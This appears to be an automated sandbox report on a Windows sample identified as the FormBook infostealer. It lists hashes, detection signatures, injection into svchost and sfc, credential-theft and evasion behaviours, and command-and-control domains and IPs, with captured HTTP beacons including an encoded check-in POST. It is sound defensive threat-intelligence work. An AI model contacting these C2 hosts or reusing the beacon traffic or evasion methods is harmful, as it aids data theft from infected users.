Edit tour

Windows Analysis Report
eoIIBcxUj3.exe

Overview

General Information

Sample name:	eoIIBcxUj3.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	c2c8b9851e807452f57cd7a1fabec3ba
Analysis ID:	1653437
MD5:	c2c8b9851e807452f57cd7a1fabec3ba
SHA1:	d38ad61023caa4d2c2b10e3474ed5658d797cc58
SHA256:	64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Classification

Process Tree

System is w10x64

eoIIBcxUj3.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: C2C8B9851E807452F57CD7A1FABEC3BA)

svchost.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

UJarIfYl5U.exe (PID: 6356 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

sfc.exe (PID: 3888 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)

UJarIfYl5U.exe (PID: 6292 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7616 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-01T09:04:00.390735+0200	2856318	1	A Network Trojan was detected	192.168.2.4	49724	13.248.213.45	80	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• E-Banking Fraud
• System Summary
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: eoIIBcxUj3.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk	Avira URL Cloud: Label: malware
Source: http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk	Avira URL Cloud: Label: malware
Source: http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk	Avira URL Cloud: Label: malware
Source: http://www.sigaque.today/n61y/	Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz	Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz/gwiz/	Avira URL Cloud: Label: malware
Source: http://www.qzsazi.info/iwsk/	Avira URL Cloud: Label: malware
Source: http://www.cruycq.info/0vwm/	Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: eoIIBcxUj3.exe	Virustotal: Detection: 75%			Perma Link
Source: eoIIBcxUj3.exe	ReversingLabs: Detection: 78%

Yara detected FormBook

Source: Yara match	File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: eoIIBcxUj3.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49724 -> 13.248.213.45:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031233226.xyz
Source:	DNS query: www.031233226.xyz
Source:	DNS query: www.l33900.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 13.248.213.45 13.248.213.45
Source: Joe Sandbox View	IP Address: 194.9.94.85 194.9.94.85

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.031233226.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.woodsplace.netUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.sigaque.todayUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.cruycq.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeHost: www.l33900.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.031233226.xyz
Source: global traffic	DNS traffic detected: DNS query: www.vipstargold.buzz
Source: global traffic	DNS traffic detected: DNS query: www.woodsplace.net
Source: global traffic	DNS traffic detected: DNS query: www.sigaque.today
Source: global traffic	DNS traffic detected: DNS query: www.kitculture.shop
Source: global traffic	DNS traffic detected: DNS query: www.f66el619d.shop
Source: global traffic	DNS traffic detected: DNS query: www.alplace.site
Source: global traffic	DNS traffic detected: DNS query: www.cruycq.info
Source: global traffic	DNS traffic detected: DNS query: www.elevatetextiles.net
Source: global traffic	DNS traffic detected: DNS query: www.qzsazi.info
Source: global traffic	DNS traffic detected: DNS query: www.l33900.xyz
Source: global traffic	DNS traffic detected: DNS query: www.milp.store

Source: unknown

HTTP traffic detected: POST /cu04/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.woodsplace.netOrigin: http://www.woodsplace.netReferer: http://www.woodsplace.net/cu04/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:03:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b2d4a8842da-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b3dcb48438e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Apr 2025 07:04:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 92963b4e4df88c47-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
